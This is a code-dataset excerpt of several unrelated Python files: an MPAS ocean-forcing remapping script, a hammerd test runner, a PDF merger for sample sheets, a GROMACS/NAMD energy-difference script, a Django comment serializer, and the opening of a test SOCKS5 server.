    return arrayOut
#-------------------------------------------------------------------------------
def interpolate_array(nCells, remapMatrix, arrayIn):
    """Remap each time slice of arrayIn onto the nCells destination grid.

    arrayIn has shape (nTimes, nx, ny); each slice is flattened and
    multiplied by remapMatrix.  Generalized to handle any number of leading
    time slices (the original hard-coded 12 monthly slices); callers that
    pass 12-month climatologies are unaffected.
    """
    nTimes = arrayIn.shape[0]
    arrayOut = np.zeros((nTimes, nCells))
    for iTime in range(0, nTimes):
        # Flatten the 2-D source slice to match the remap matrix columns.
        arrayOut[iTime, :] = remapMatrix.dot(arrayIn[iTime, :, :].flatten())
    return arrayOut
#-------------------------------------------------------------------------------
def create_forcing(filenameIn, filenameOut, nCells, remapMatrix):
    """Remap a gx1 monthly ocean climatology onto the MPAS mesh.

    Reads the gx1 fields from filenameIn, fills missing values, remaps each
    field with remapMatrix, and writes a 12-month NETCDF3 forcing file
    (filenameOut) with an xtime record plus one variable per ocean field.

    filenameIn -- gx1 ocean mixed climatology (netCDF).
    filenameOut -- MPAS forcing file to create.
    nCells -- number of MPAS cells (destination grid size).
    remapMatrix -- sparse remapping weights from get_remapping_data().
    """
    # (gx1 input variable, take surface depth level, MPAS output variable)
    fields = [
        ("T",    False, "seaSurfaceTemperature"),
        ("S",    False, "seaSurfaceSalinity"),
        ("U",    True,  "uOceanVelocity"),
        ("V",    True,  "vOceanVelocity"),
        ("dhdx", False, "seaSurfaceTiltU"),
        ("dhdy", False, "seaSurfaceTiltV"),
        ("hblt", False, "oceanMixedLayerDepth"),
        ("qdp",  False, "oceanHeatFluxConvergence"),
    ]
    fileIn = Dataset(filenameIn, "r")
    fileOut = Dataset(filenameOut, "w", format="NETCDF3_CLASSIC")
    fileOut.createDimension("nCells", nCells)
    fileOut.createDimension("StrLen", 64)
    fileOut.createDimension("Time", None)
    # Time axis: 12 monthly records as fixed-width character timestamps,
    # 19 significant characters padded with blanks to StrLen.
    xtimes = create_output_times(12, 0)
    varXtime = fileOut.createVariable("xtime", "c", dimensions=["Time", "StrLen"])
    for iTime in range(0, 12):
        varXtime[iTime, 0:19] = netCDF4.stringtochar(np.array(xtimes[iTime], 'S19'))
        varXtime[iTime, 19:] = " " * 45
    # Define every output variable first (single NETCDF3 define pass),
    # then fill them field by field.
    outVars = {}
    for varNameIn, sliceSurface, varNameOut in fields:
        outVars[varNameOut] = fileOut.createVariable(
            varNameOut, "d", dimensions=["Time", "nCells"])
    for varNameIn, sliceSurface, varNameOut in fields:
        print("Interpolate %s" % varNameOut)
        # U/V are 4-D (time, depth, y, x); take the surface level.
        if sliceSurface:
            arrayIn = fileIn.variables[varNameIn][:, 0, :, :]
        else:
            arrayIn = fileIn.variables[varNameIn][:]
        arrayIn = fill_array(arrayIn)
        outVars[varNameOut][:] = interpolate_array(nCells, remapMatrix, arrayIn)
    fileIn.close()
    fileOut.close()
#-------------------------------------------------------------------------------
def perform_remapping(\
    filenameMPASGrid, \
    filenameGx1Grid, \
    filenameGx1OceanMixed, \
    filenameMPASOceanMixed, \
    scripDir):
    """Drive the full gx1 -> MPAS ocean forcing pipeline.

    Builds SCRIP descriptions of both grids, runs the external SCRIP
    executable (scripDir/scrip) to generate remapping weights, then writes
    the remapped ocean climatology.  Intermediate *_tmp.nc files are left
    in the working directory.
    """
    # create MPAS scrip grid file
    print("create_scrip_file_MPAS")
    scripGridFilename = "remap_grid_MPAS_tmp.nc"
    create_scrip_file_MPAS(filenameMPASGrid, scripGridFilename)
    # create gx1 scrip grid file
    print("create_scrip_file_gx1")
    scripGx1Filename = "remap_grid_gx1_tmp.nc"
    create_scrip_file_gx1(scripGx1Filename, filenameGx1Grid)
    # create the scrip_in control file consumed by the SCRIP executable
    print("write_scrip_in_file")
    write_scrip_in_file("gx1")
    # run the external SCRIP tool to generate the remapping weights
    print("SCRIP")
    cmd = scripDir + "/scrip"
    os.system(cmd)
    # load the remapping weights produced above
    print("get_remapping_data")
    filenameRemapping = "remap_gx1_to_MPAS_tmp.nc"
    remapMatrix, dstGridSize = get_remapping_data(filenameRemapping)
    print("create_forcing ocean climatology")
    # combined ocean climatology
    create_forcing(\
        filenameGx1OceanMixed, \
        filenameMPASOceanMixed, \
        dstGridSize, \
        remapMatrix)
#-------------------------------------------------------------------------------
'''
create_ocean_forcing.py
=======================
Usage
-----
This script creates ocean forcing using CESM output.
Usage: python create_ocean_forcing.py configFilename
where configFilename is a python config file with the following example format:
[forcing_generation]
filenameMPASGrid = /location/of/MPAS/grid
filenameGx1Grid = /location/of/gx1/grid
filenameGx1OceanMixed = /location/of/gx1/ocean_mixed_file
filenameMPASOceanMixed = /location/of/output/ocean_mixed_file
scripDir = /location/of/SCRIP/executable
SCRIP
-----
This script requires the SCRIP package to be installed.
SCRIP is a software package which computes addresses and weights for remapping
and interpolating fields between grids in spherical coordinates. It can be
obtained from https://github.com/SCRIP-Project/SCRIP
gx1 input data
--------------
This script requires a gx1 grid file and ocean mixed file as input. These can be
obtained from:
https://web.lcrc.anl.gov/public/e3sm/mpas_standalonedata/mpas-seaice/forcing/
MPAS-Seaice_clim_data.tar.gz
'''
# Command-line entry point: expects a single config-file argument.
if (len(sys.argv) != 2):
    print("Usage: python create_ocean_forcing.py configFilename")
    sys.exit()
# All input/output locations come from the [forcing_generation] section.
config = ConfigParser.ConfigParser()
config.read(sys.argv[1])
filenameMPASGrid = config.get('forcing_generation','filenameMPASGrid')
filenameGx1Grid = config.get('forcing_generation','filenameGx1Grid')
filenameGx1OceanMixed = config.get('forcing_generation','filenameGx1OceanMixed')
filenameMPASOceanMixed = config.get('forcing_generation','filenameMPASOceanMixed')
scripDir = config.get('forcing_generation','scripDir')
perform_remapping(\
    filenameMPASGrid, \
    filenameGx1Grid, \
    filenameGx1OceanMixed, \
    filenameMPASOceanMixed, \
    scripDir)
| 30.836111 | 155 | 0.602198 | from __future__ import print_function
from netCDF4 import Dataset
import netCDF4
import numpy as np
import os
import sys
import ConfigParser
import math
from scipy.interpolate import griddata
from create_forcing import create_scrip_grid_file, get_mpas_grid_info, create_scrip_file_MPAS, write_scrip_in_file, create_output_times, get_remapping_data
def latlon_to_xyz(lat, lon):
    """Convert radian (lat, lon) on the unit sphere to Cartesian (x, y, z)."""
    cos_lat = math.cos(lat)
    return cos_lat * math.cos(lon), cos_lat * math.sin(lon), math.sin(lat)
def xyz_to_latlon(x, y, z):
    """Convert Cartesian (x, y, z) back to radian (lat, lon).

    Points on the polar axis (x == y == 0) get lon = 0 by convention.
    """
    lon = math.atan2(y, x) if (x != 0.0 or y != 0.0) else 0.0
    radius = math.sqrt(x * x + y * y + z * z)
    return math.asin(z / radius), lon
def create_scrip_file_gx1(filenameScrip, filenameGx1Grid):
    """Write a SCRIP-format grid description of the POP gx1 ocean grid.

    Reads the corner coordinates (ULON/ULAT, radians) from filenameGx1Grid,
    reconstructs the four corners and the centroid of every cell, and hands
    the result to create_scrip_grid_file to produce filenameScrip.

    BUG FIX: the original immediately overwrote filenameGx1Grid with a
    hard-coded local path, silently ignoring the caller's argument; that
    override is removed (the unused KMT read is dropped as well).
    """
    fileIn = Dataset(filenameGx1Grid, "r")
    nx = len(fileIn.dimensions["nx"])
    ny = len(fileIn.dimensions["ny"])
    ULONin = fileIn.variables["ULON"][:]
    ULATin = fileIn.variables["ULAT"][:]
    fileIn.close()
    nCells = nx * ny
    gridDims = [nx, ny]
    # All cells participate in the remapping (no land mask applied here).
    gridImask = np.ones(nCells, dtype="i")
    # Pad the corner arrays by one row/column: column 0 wraps the periodic
    # longitude seam; row 0 extrapolates one degree (pi/180 rad) south.
    ULAT = np.zeros((ny + 1, nx + 1))
    ULON = np.zeros((ny + 1, nx + 1))
    ULAT[1:, 1:] = ULATin[:, :]
    ULON[1:, 1:] = ULONin[:, :]
    ULAT[:, 0] = ULAT[:, -1]
    ULON[:, 0] = ULON[:, -1]
    ULON[0, :] = ULON[1, :]
    ULAT[0, :] = ULAT[1, :] - math.pi / 180.0
    cornerLat = np.zeros((4, nCells))
    cornerLon = np.zeros((4, nCells))
    for i in range(0, nx):
        for j in range(0, ny):
            ii = i + 1
            jj = j + 1
            iCell = ii + nx * (jj - 1) - 1
            # Counter-clockwise corners in padded indices: SW, SE, NE, NW.
            i1 = ii - 1; j1 = jj - 1
            i2 = ii;     j2 = jj - 1
            i3 = ii;     j3 = jj
            i4 = ii - 1; j4 = jj
            cornerLat[0, iCell] = ULAT[j1, i1]
            cornerLat[1, iCell] = ULAT[j2, i2]
            cornerLat[2, iCell] = ULAT[j3, i3]
            cornerLat[3, iCell] = ULAT[j4, i4]
            cornerLon[0, iCell] = ULON[j1, i1]
            cornerLon[1, iCell] = ULON[j2, i2]
            cornerLon[2, iCell] = ULON[j3, i3]
            cornerLon[3, iCell] = ULON[j4, i4]
    centerLat = np.zeros(nCells)
    centerLon = np.zeros(nCells)
    for i in range(0, nx):
        for j in range(0, ny):
            ii = i + 1
            jj = j + 1
            iCell = ii + nx * (jj - 1) - 1
            # Cell centre: Cartesian mean of the four corners projected back
            # to the sphere (avoids longitude-wrap averaging artefacts).
            x1, y1, z1 = latlon_to_xyz(cornerLat[0, iCell], cornerLon[0, iCell])
            x2, y2, z2 = latlon_to_xyz(cornerLat[1, iCell], cornerLon[1, iCell])
            x3, y3, z3 = latlon_to_xyz(cornerLat[2, iCell], cornerLon[2, iCell])
            x4, y4, z4 = latlon_to_xyz(cornerLat[3, iCell], cornerLon[3, iCell])
            x0 = 0.25 * (x1 + x2 + x3 + x4)
            y0 = 0.25 * (y1 + y2 + y3 + y4)
            z0 = 0.25 * (z1 + z2 + z3 + z4)
            centerLat[iCell], centerLon[iCell] = xyz_to_latlon(x0, y0, z0)
    create_scrip_grid_file(filenameScrip, nCells, 4, 2, gridDims, centerLat,
                           centerLon, gridImask, cornerLat, cornerLon, "gx1")
def fill_array(arrayIn):
    """Replace missing values with their nearest valid neighbour, per slice.

    arrayIn has shape (nTimes, nx, ny); values <= -900 are the missing-data
    sentinel.  Each time slice is filled independently by nearest-neighbour
    lookup on the (i, j) grid indices.  Returns a new array; arrayIn is left
    untouched.

    Note: the original also built a 3x-tiled copy of each slice that was
    never read (only column indices < ny were ever used), so that dead work
    is dropped; results are unchanged.
    """
    nTimes, nx, ny = arrayIn.shape
    arrayOut = np.zeros((nTimes, nx, ny))
    arrayOut[:] = arrayIn[:]
    grid_x, grid_y = np.mgrid[0:nx, 0:ny]
    for iTime in range(0, nTimes):
        timeSlice = arrayIn[iTime, :, :]
        good = timeSlice > -900.0
        # Indices/values of valid cells, in the same row-major order the
        # original nested loops produced them (keeps tie-breaking identical).
        pointsGood = np.argwhere(good)
        valuesGood = timeSlice[good]
        # Nearest-neighbour field over the whole slice; valid cells map to
        # themselves, so only the bad cells need copying back.
        filled = griddata(pointsGood, valuesGood, (grid_x, grid_y), method='nearest')
        bad = ~good
        arrayOut[iTime][bad] = filled[bad]
    return arrayOut
def interpolate_array(nCells, remapMatrix, arrayIn):
    """Remap each time slice of arrayIn onto the nCells destination grid.

    arrayIn has shape (nTimes, nx, ny); each slice is flattened and
    multiplied by remapMatrix.  Generalized to handle any number of leading
    time slices (the original hard-coded 12 monthly slices); callers that
    pass 12-month climatologies are unaffected.
    """
    nTimes = arrayIn.shape[0]
    arrayOut = np.zeros((nTimes, nCells))
    for iTime in range(0, nTimes):
        # Flatten the 2-D source slice to match the remap matrix columns.
        arrayOut[iTime, :] = remapMatrix.dot(arrayIn[iTime, :, :].flatten())
    return arrayOut
def create_forcing(filenameIn, filenameOut, nCells, remapMatrix):
    """Remap a gx1 monthly ocean climatology onto the MPAS mesh.

    Reads the gx1 fields from filenameIn, fills missing values, remaps each
    field with remapMatrix, and writes a 12-month NETCDF3 forcing file
    (filenameOut) with an xtime record plus one variable per ocean field.

    filenameIn -- gx1 ocean mixed climatology (netCDF).
    filenameOut -- MPAS forcing file to create.
    nCells -- number of MPAS cells (destination grid size).
    remapMatrix -- sparse remapping weights from get_remapping_data().
    """
    # (gx1 input variable, take surface depth level, MPAS output variable)
    fields = [
        ("T",    False, "seaSurfaceTemperature"),
        ("S",    False, "seaSurfaceSalinity"),
        ("U",    True,  "uOceanVelocity"),
        ("V",    True,  "vOceanVelocity"),
        ("dhdx", False, "seaSurfaceTiltU"),
        ("dhdy", False, "seaSurfaceTiltV"),
        ("hblt", False, "oceanMixedLayerDepth"),
        ("qdp",  False, "oceanHeatFluxConvergence"),
    ]
    fileIn = Dataset(filenameIn, "r")
    fileOut = Dataset(filenameOut, "w", format="NETCDF3_CLASSIC")
    fileOut.createDimension("nCells", nCells)
    fileOut.createDimension("StrLen", 64)
    fileOut.createDimension("Time", None)
    # Time axis: 12 monthly records as fixed-width character timestamps,
    # 19 significant characters padded with blanks to StrLen.
    xtimes = create_output_times(12, 0)
    varXtime = fileOut.createVariable("xtime", "c", dimensions=["Time", "StrLen"])
    for iTime in range(0, 12):
        varXtime[iTime, 0:19] = netCDF4.stringtochar(np.array(xtimes[iTime], 'S19'))
        varXtime[iTime, 19:] = " " * 45
    # Define every output variable first (single NETCDF3 define pass),
    # then fill them field by field.
    outVars = {}
    for varNameIn, sliceSurface, varNameOut in fields:
        outVars[varNameOut] = fileOut.createVariable(
            varNameOut, "d", dimensions=["Time", "nCells"])
    for varNameIn, sliceSurface, varNameOut in fields:
        print("Interpolate %s" % varNameOut)
        # U/V are 4-D (time, depth, y, x); take the surface level.
        if sliceSurface:
            arrayIn = fileIn.variables[varNameIn][:, 0, :, :]
        else:
            arrayIn = fileIn.variables[varNameIn][:]
        arrayIn = fill_array(arrayIn)
        outVars[varNameOut][:] = interpolate_array(nCells, remapMatrix, arrayIn)
    fileIn.close()
    fileOut.close()
def perform_remapping(filenameMPASGrid, filenameGx1Grid, filenameGx1OceanMixed,
                      filenameMPASOceanMixed, scripDir):
    """Drive the full gx1 -> MPAS ocean forcing pipeline.

    Builds SCRIP descriptions of both grids, runs the external SCRIP
    executable (scripDir/scrip) to generate remapping weights, then writes
    the remapped ocean climatology forcing file.
    """
    print("create_scrip_file_MPAS")
    mpasScripFile = "remap_grid_MPAS_tmp.nc"
    create_scrip_file_MPAS(filenameMPASGrid, mpasScripFile)
    print("create_scrip_file_gx1")
    gx1ScripFile = "remap_grid_gx1_tmp.nc"
    create_scrip_file_gx1(gx1ScripFile, filenameGx1Grid)
    print("write_scrip_in_file")
    write_scrip_in_file("gx1")
    # Run the external SCRIP tool to produce the weights file.
    print("SCRIP")
    os.system(scripDir + "/scrip")
    print("get_remapping_data")
    weightsFile = "remap_gx1_to_MPAS_tmp.nc"
    remapMatrix, dstGridSize = get_remapping_data(weightsFile)
    print("create_forcing ocean climatology")
    create_forcing(filenameGx1OceanMixed, filenameMPASOceanMixed,
                   dstGridSize, remapMatrix)
# Command-line entry point: expects a single config-file argument.
if (len(sys.argv) != 2):
    print("Usage: python create_ocean_forcing.py configFilename")
    sys.exit()
# All input/output locations come from the [forcing_generation] section.
config = ConfigParser.ConfigParser()
config.read(sys.argv[1])
filenameMPASGrid = config.get('forcing_generation','filenameMPASGrid')
filenameGx1Grid = config.get('forcing_generation','filenameGx1Grid')
filenameGx1OceanMixed = config.get('forcing_generation','filenameGx1OceanMixed')
filenameMPASOceanMixed = config.get('forcing_generation','filenameMPASOceanMixed')
scripDir = config.get('forcing_generation','scripDir')
perform_remapping(\
    filenameMPASGrid, \
    filenameGx1Grid, \
    filenameGx1OceanMixed, \
    filenameMPASOceanMixed, \
    scripDir)
| true | true |
f725d7bce110226cd80cad4c972a9de2caa719fe | 1,365 | py | Python | hammerd/hammertests/hammertests_control_tp.py | emersion/chromiumos-platform2 | ba71ad06f7ba52e922c647a8915ff852b2d4ebbd | [
"BSD-3-Clause"
] | 5 | 2019-01-19T15:38:48.000Z | 2021-10-06T03:59:46.000Z | hammerd/hammertests/hammertests_control_tp.py | emersion/chromiumos-platform2 | ba71ad06f7ba52e922c647a8915ff852b2d4ebbd | [
"BSD-3-Clause"
] | null | null | null | hammerd/hammertests/hammertests_control_tp.py | emersion/chromiumos-platform2 | ba71ad06f7ba52e922c647a8915ff852b2d4ebbd | [
"BSD-3-Clause"
] | 1 | 2019-02-15T23:05:30.000Z | 2019-02-15T23:05:30.000Z | #!/usr/bin/env python2
# Copyright 2018 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Control file for the following tests
rb_protection.py
'''
from __future__ import print_function
import os
import shutil
import sys
def main(argv):
if len(argv) > 0:
sys.exit('Test takes no args!')
iterations = 1
output_to_stdout = ' 2>&1 | tee '
python_prefix = 'python '
test_list = ['transfer_touchpad_works']
for test in test_list:
logs_dir = 'logs/' + test
if os.path.exists(logs_dir):
shutil.rmtree(logs_dir)
os.makedirs(logs_dir)
for i in range(iterations):
iteration_num = i + 1
print('==========================================================')
print('TEST NAME: ' + test)
print('ITERATION ' + str(iteration_num) + ' OF ' +
str(iterations))
print('==========================================================')
cmd = '{0}{1}{2}{3}{4}{5}{6}{7}{8}'.format(python_prefix, test,
'.py', output_to_stdout,
logs_dir, '/', test,
iteration_num, '.log')
os.system(cmd)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| 29.673913 | 73 | 0.519414 |
from __future__ import print_function
import os
import shutil
import sys
def main(argv):
if len(argv) > 0:
sys.exit('Test takes no args!')
iterations = 1
output_to_stdout = ' 2>&1 | tee '
python_prefix = 'python '
test_list = ['transfer_touchpad_works']
for test in test_list:
logs_dir = 'logs/' + test
if os.path.exists(logs_dir):
shutil.rmtree(logs_dir)
os.makedirs(logs_dir)
for i in range(iterations):
iteration_num = i + 1
print('==========================================================')
print('TEST NAME: ' + test)
print('ITERATION ' + str(iteration_num) + ' OF ' +
str(iterations))
print('==========================================================')
cmd = '{0}{1}{2}{3}{4}{5}{6}{7}{8}'.format(python_prefix, test,
'.py', output_to_stdout,
logs_dir, '/', test,
iteration_num, '.log')
os.system(cmd)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| true | true |
f725d8c9c18f752a5eb6f5c8c45f1e57f22267b2 | 2,782 | py | Python | AddSampleSheetBackPage.py | adambreznicky/smudge_python | af7ba221890253ac6fe7f38691b351861f8b3d96 | [
"MIT"
] | 1 | 2017-05-24T02:05:20.000Z | 2017-05-24T02:05:20.000Z | AddSampleSheetBackPage.py | adambreznicky/smudge_python | af7ba221890253ac6fe7f38691b351861f8b3d96 | [
"MIT"
] | null | null | null | AddSampleSheetBackPage.py | adambreznicky/smudge_python | af7ba221890253ac6fe7f38691b351861f8b3d96 | [
"MIT"
] | null | null | null | from PyPDF2 import PdfFileMerger
import operator
import os
def fileMerge(district, sorted_fileDict):
    '''Merge one district's sample sheets into a single bound PDF.

    Appends each sample sheet (bookmarked "Sample <id>") followed by a blank
    back-page worksheet, then writes <district>_District_Merged.pdf into the
    Combined folder.

    district -- district name used in messages and the output file name.
    sorted_fileDict -- (sampleID, fileName) pairs, sorted by sample ID.

    BUG FIX: the original never closed the output file or any of the input
    handles; all handles are now closed once the merged PDF is written.
    '''
    print("Creating Bound PDF for %s District" % district)
    # Folder holding the individual sample sheet PDFs, and the output folder.
    sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
    outputPath = sampleSheetPath + os.sep + "Combined"
    backPagePath = "T:\\DATAMGT\\HPMS-DATA\\2012Data\\Field Reviews\\Field Review Sample Selection\\SectionID_Maps\\assets\\HPMS Back Page Worksheet - Copy.pdf"
    merger = PdfFileMerger()
    inputFiles = []  # inputs must stay open until merger.write() has run
    total = len(sorted_fileDict)
    counter = 0
    for sampleID, fileName in sorted_fileDict:
        counter += 1
        print("...adding sheet %i of %i" % (counter, total))
        sheetFile = open(sampleSheetPath + os.sep + fileName, "rb")
        backPageFile = open(backPagePath, "rb")
        inputFiles.append(sheetFile)
        inputFiles.append(backPageFile)
        # Bookmark the sheet by its sample ID, then append the back page.
        merger.append(sheetFile, "Sample " + str(sampleID))
        merger.append(backPageFile)
    output = open(outputPath + os.sep + district + "_District_Merged.pdf", "wb")
    print("Saving bound PDF for %s District" % district)
    try:
        merger.write(output)
    finally:
        output.close()
        for handle in inputFiles:
            handle.close()
    del merger
def createSampleSheetList():
'''Creates a list of files to be exported for each district'''
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
outputPath = sampleSheetPath + os.sep + "Combined"
if not os.path.exists(outputPath):
os.makedirs(outputPath)
sampleSheets = os.listdir(sampleSheetPath)
counter = len(sampleSheets)
if "Combined" in sampleSheets:
sampleSheets.remove("Combined")
district = ""
previousDistrict = ""
fileDict = {}
for sheet in sampleSheets:
district = str(sheet).split("_")[0]
sampleKey = int(((str(sheet).split("_")[3])).split(".")[0])
if district == previousDistrict or previousDistrict == "" or district is None:
fileDict[sampleKey] = sheet
previousDistrict = district
counter -= 1
elif counter == 1:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
else:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
previousDistrict = district
createSampleSheetList() | 39.742857 | 170 | 0.658519 | from PyPDF2 import PdfFileMerger
import operator
import os
def fileMerge(district, sorted_fileDict):
'''Creates a list of files to be exported for each district'''
print "Creating Bound PDF for %s District" % district
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
outputPath = sampleSheetPath + os.sep + "Combined"
merger = PdfFileMerger()
total = len(sorted_fileDict)
counter = 0
for sampleID, fileName in sorted_fileDict:
counter += 1
print "...adding sheet %i of %i" % (counter, total)
input1 = open(sampleSheetPath + os.sep + fileName, "rb")
input2 = open("T:\\DATAMGT\\HPMS-DATA\\2012Data\\Field Reviews\\Field Review Sample Selection\\SectionID_Maps\\assets\\HPMS Back Page Worksheet - Copy.pdf", "rb")
# append entire input3 document to the end of the output document
merger.append(input1, "Sample " + str(sampleID))
merger.append(input2)
# Write to an output PDF document
output = open(outputPath + os.sep + district + "_District_Merged.pdf", "wb")
print "Saving bound PDF for %s District" % district
merger.write(output)
del merger
def createSampleSheetList():
'''Creates a list of files to be exported for each district'''
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
outputPath = sampleSheetPath + os.sep + "Combined"
if not os.path.exists(outputPath):
os.makedirs(outputPath)
sampleSheets = os.listdir(sampleSheetPath)
counter = len(sampleSheets)
if "Combined" in sampleSheets:
sampleSheets.remove("Combined")
district = ""
previousDistrict = ""
fileDict = {}
for sheet in sampleSheets:
district = str(sheet).split("_")[0]
sampleKey = int(((str(sheet).split("_")[3])).split(".")[0])
if district == previousDistrict or previousDistrict == "" or district is None:
fileDict[sampleKey] = sheet
previousDistrict = district
counter -= 1
elif counter == 1:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
else:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
previousDistrict = district
createSampleSheetList() | false | true |
f725d8d28b3442d977bd49f6e51ed9adcdb15b84 | 698 | py | Python | GMX_TEST/DIP/DIFF.py | leelasd/OPLS-AAM_for_Gromacs | 50ff268525e9177e46175fdb122276c0045f1dab | [
"MIT"
] | 6 | 2017-10-14T10:10:51.000Z | 2020-12-11T15:19:39.000Z | GMX_TEST/DIP/DIFF.py | leelasd/OPLS-AAM_for_Gromacs | 50ff268525e9177e46175fdb122276c0045f1dab | [
"MIT"
] | 1 | 2019-06-18T20:37:23.000Z | 2019-06-18T20:37:23.000Z | GMX_TEST/DIP/DIFF.py | leelasd/OPLS-AAM_for_Gromacs | 50ff268525e9177e46175fdb122276c0045f1dab | [
"MIT"
] | 3 | 2020-07-10T10:41:58.000Z | 2021-11-14T19:30:05.000Z | import os
from collections import OrderedDict
import sys
fil = open('energy.xvg').readlines()
GMX_dat = [float(f)/4.184 for f in fil[-1].split()[1:-1]]
nfil = open('LOG_NAMD').readlines()
for line in nfil:
if 'ENERGY: 200' in line:
NAMD_DAT = [float(f) for f in line.split()[2:12]]
print(NAMD_DAT)
print('BOND_DIFF: %5.5f'%(GMX_dat[0]-NAMD_DAT[0]))
print('ANGL_DIFF: %5.5f'%(GMX_dat[1]-NAMD_DAT[1]))
print('TORS_DIFF: %5.5f'%(GMX_dat[2]-NAMD_DAT[2]))
print('IMPR_DIFF: %5.5f'%(GMX_dat[3]-NAMD_DAT[3]))
print('ELEC_DIFF: %5.5f'%(GMX_dat[5]+GMX_dat[7]-NAMD_DAT[4]))
print('VDWL_DIFF: %5.5f'%(GMX_dat[4]+GMX_dat[6]-NAMD_DAT[5]))
print('TOTL_DIFF: %5.5f'%(GMX_dat[8]-NAMD_DAT[9]))
| 36.736842 | 61 | 0.661891 | import os
from collections import OrderedDict
import sys
fil = open('energy.xvg').readlines()
GMX_dat = [float(f)/4.184 for f in fil[-1].split()[1:-1]]
nfil = open('LOG_NAMD').readlines()
for line in nfil:
if 'ENERGY: 200' in line:
NAMD_DAT = [float(f) for f in line.split()[2:12]]
print(NAMD_DAT)
print('BOND_DIFF: %5.5f'%(GMX_dat[0]-NAMD_DAT[0]))
print('ANGL_DIFF: %5.5f'%(GMX_dat[1]-NAMD_DAT[1]))
print('TORS_DIFF: %5.5f'%(GMX_dat[2]-NAMD_DAT[2]))
print('IMPR_DIFF: %5.5f'%(GMX_dat[3]-NAMD_DAT[3]))
print('ELEC_DIFF: %5.5f'%(GMX_dat[5]+GMX_dat[7]-NAMD_DAT[4]))
print('VDWL_DIFF: %5.5f'%(GMX_dat[4]+GMX_dat[6]-NAMD_DAT[5]))
print('TOTL_DIFF: %5.5f'%(GMX_dat[8]-NAMD_DAT[9]))
| true | true |
f725d93f74485f2e2384998211087edd14cd10b4 | 1,223 | py | Python | comment/serializers.py | vahidtwo/simpleSocialSite | 40d971f04b7127811b7e277ddb3068fb451e9574 | [
"MIT"
] | 1 | 2020-05-16T16:14:51.000Z | 2020-05-16T16:14:51.000Z | comment/serializers.py | vahidtwo/simpleSocialSite | 40d971f04b7127811b7e277ddb3068fb451e9574 | [
"MIT"
] | 5 | 2021-03-18T23:21:18.000Z | 2022-01-13T02:10:19.000Z | comment/serializers.py | vahidtwo/simpleSocialSite | 40d971f04b7127811b7e277ddb3068fb451e9574 | [
"MIT"
] | null | null | null | from django.db.models import Sum
from rest_framework import serializers
from like.models import Like
from .models import Comment
from accounts.serializers import UserSerializer
class CommentSerializer(serializers.ModelSerializer):
owner = UserSerializer(read_only=True)
like = serializers.SerializerMethodField()
def get_like(self, obj):
if type(obj) is Comment:
if obj._meta is Comment._meta:
liked = Like.objects.filter(comment_id=obj.id, value=1).aggregate(Sum('value'))['value__sum']
dislike = Like.objects.filter(comment_id=obj.id, value=-1).aggregate(Sum('value'))['value__sum']
liked = liked if liked else 0
dislike = dislike if dislike else 0
return {'liked': liked, 'disLiked': dislike}
return {'liked': 0, 'disLiked': 0}
def validate_post(self, attrs):
if not attrs:
raise serializers.ValidationError('post not send ')
def validate_comment(self, attrs):
if not dict(self.initial_data).get('post'):
if not attrs:
raise serializers.ValidationError('comment not send ')
def update(self, instance, validated_data):
instance.body = validated_data.get('body', instance.body)
instance.save()
return instance
class Meta:
model = Comment
fields = '__all__'
| 31.358974 | 100 | 0.739166 | from django.db.models import Sum
from rest_framework import serializers
from like.models import Like
from .models import Comment
from accounts.serializers import UserSerializer
class CommentSerializer(serializers.ModelSerializer):
owner = UserSerializer(read_only=True)
like = serializers.SerializerMethodField()
def get_like(self, obj):
if type(obj) is Comment:
if obj._meta is Comment._meta:
liked = Like.objects.filter(comment_id=obj.id, value=1).aggregate(Sum('value'))['value__sum']
dislike = Like.objects.filter(comment_id=obj.id, value=-1).aggregate(Sum('value'))['value__sum']
liked = liked if liked else 0
dislike = dislike if dislike else 0
return {'liked': liked, 'disLiked': dislike}
return {'liked': 0, 'disLiked': 0}
def validate_post(self, attrs):
if not attrs:
raise serializers.ValidationError('post not send ')
def validate_comment(self, attrs):
if not dict(self.initial_data).get('post'):
if not attrs:
raise serializers.ValidationError('comment not send ')
def update(self, instance, validated_data):
instance.body = validated_data.get('body', instance.body)
instance.save()
return instance
class Meta:
model = Comment
fields = '__all__'
| true | true |
f725d9770174732322b6fe8380b521e22d1f1a54 | 5,699 | py | Python | qa/rpc-tests/test_framework/socks5.py | kileer/monix | 86525601d5915f380976c9d2e686ad7f66db991f | [
"MIT"
] | 174 | 2018-01-16T13:26:52.000Z | 2022-02-16T15:12:10.000Z | qa/rpc-tests/test_framework/socks5.py | kileer/monix | 86525601d5915f380976c9d2e686ad7f66db991f | [
"MIT"
] | 32 | 2018-01-25T03:42:01.000Z | 2020-07-31T17:37:52.000Z | qa/rpc-tests/test_framework/socks5.py | kileer/monix | 86525601d5915f380976c9d2e686ad7f66db991f | [
"MIT"
] | 78 | 2017-05-26T15:23:40.000Z | 2021-07-07T10:47:37.000Z | # Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Dummy Socks5 server for testing.
'''
from __future__ import print_function, division, unicode_literals
import socket, threading, Queue
import traceback, sys
### Protocol constants
class Command:
CONNECT = 0x01
class AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
### Utility functions
